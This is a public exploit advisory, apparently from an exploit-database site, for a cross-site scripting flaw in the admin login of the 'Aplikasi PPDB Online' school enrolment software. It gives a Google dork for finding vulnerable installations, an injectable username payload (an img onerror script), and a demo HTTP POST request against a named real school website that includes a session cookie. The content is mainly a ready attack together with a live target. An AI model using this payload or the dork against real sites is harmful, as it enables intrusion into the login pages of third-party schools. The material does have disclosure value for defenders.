Aplikasi PPDB Online - Cross-site-scripting (POST) Vulnerabilities

2021.01.30
Risk: Low
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-79

############################################################# # Exploit Title: Aplikasi PPDB Online - Cross-site-scripting (POST) Vulnerabilities # Google Dork: intitle:"Halaman Login" inurl:/panel_admin/log_in # Date: 2021-1-30 # Exploit Author: Gh05t666nero # Team: IndoGhostSec # Vendor: gst-dev.net # Software Version: ppdb_2021 # Software Link: http://gst-dev.net/#services # Tested on: Linux gh05t666nero 5.10.0-kali2-686-pae #1 SMP Debian 5.10.9-1kali1 (2021-01-22) i686 GNU/Linux ############################################################# [*] Information: ════════════════ GST - Dev is a website that provides instant school website creation services. Here, you can create your own website without requiring expertise in web design and programming. All you do is fill in the form provided, choose a design theme, then within 3 days, your school website will go straight online. ############################################################# [*] Exploit: ════════════ {"username":"\"><img+src=x+onerror=prompt(1);>","password":"1","btnlogin":""} ############################################################# [*] Demo: ═════════ http://ppdb.mtsn1ponorogo.sch.id/panel_admin/log_in POST /panel_admin/log_in HTTP/1.1 Host: ppdb.mtsn1ponorogo.sch.id User-Agent: Mozilla/5.0 (X11; Linux i686; rv:78.0) Gecko/20100101 Firefox/78.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: id Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded Content-Length: 80 Origin: http://ppdb.mtsn1ponorogo.sch.id DNT: 1 Connection: keep-alive Referer: http://ppdb.mtsn1ponorogo.sch.id/panel_admin/log_in Cookie: ci_session=2a71ca59d274692e7dc3002694da6eeb6f63f351 Upgrade-Insecure-Requests: 1 ############################################################# [*] Contact: ════════════ # Website: www.anonsec.my.id # Telegram: t.me/Gh05t666nero # Instagram: instagram.com/ojan.py # Twitter: twitter.com/Gh05t666nero1 # E-mail: anoncentraI@protonmail.com


Vote for this issue:
100%
0%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2021, cxsecurity.com

 

Back to Top